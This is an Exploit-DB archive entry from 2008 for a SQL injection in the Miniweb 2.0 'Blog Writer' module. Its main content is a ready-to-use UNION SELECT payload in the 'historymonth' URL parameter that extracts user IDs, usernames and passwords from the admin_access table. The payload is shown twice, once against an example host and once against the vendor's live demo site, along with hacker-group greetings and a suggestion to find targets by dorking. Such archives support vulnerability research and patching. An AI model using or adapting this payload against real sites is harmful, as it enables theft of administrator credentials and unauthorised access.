Miniweb 2.0 - 'historymonth' SQL Injection

EDB-ID:

5548

CVE:

2008-6582 2008-2197

EDB Verified:

Author:

HaCkeR_EgY

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-05-05

Vulnerable App:

############################################
#    Rem0te SQL Injection Vulnerability    #
#         Miniweb 2.0 [ index.php ]        #
############################################

[<>]Author: HaCkeR-EgY
 
[<>]H^0mE: www.pal-hacker.com ,  atsdp.com
 
[<>]CONTact: hacker_EGY@hotmail.com  
===========================================================
[<>]Script : Miniweb  " Blog Writer "
[<>]version :  2.0
[<>]Module Price: Only $39.00
[<>]Portal Price : $ 117
[<>]DOWNL0AD Trial : www.miniweb2.com
============================================================
 
[<>] D0RK : hmmm........ user YOUR Mind (:
 
[<>] ExPLO!t :
              
  ===>http://example.com/miniweb2/index.php?module=blogwriter&historyyear=2007&historymonth=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,user_id,username,password),4,5,6,7,8,9,10/**/from/**/admin_access/*
 
[<>] live D!mO :
             
  ===> http://miniweb2.com/moduledemo/blogwriter/index.php?historyyear=2008&historymonth=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,user_id,username,password),4,5,6,7,8,9,10/**/from/**/admin_access/*
 
==============================================================
[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "
 
[<>] Greetz : F!resell , Mohamed el Arab ,Mr.EXE , DaRk MaStEr ,H-T Team
                       Gold_M , V4 Team , Jiki Team  , RoMaNcYxHaCkEr
===============================================================

# milw0rm.com [2008-05-05]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services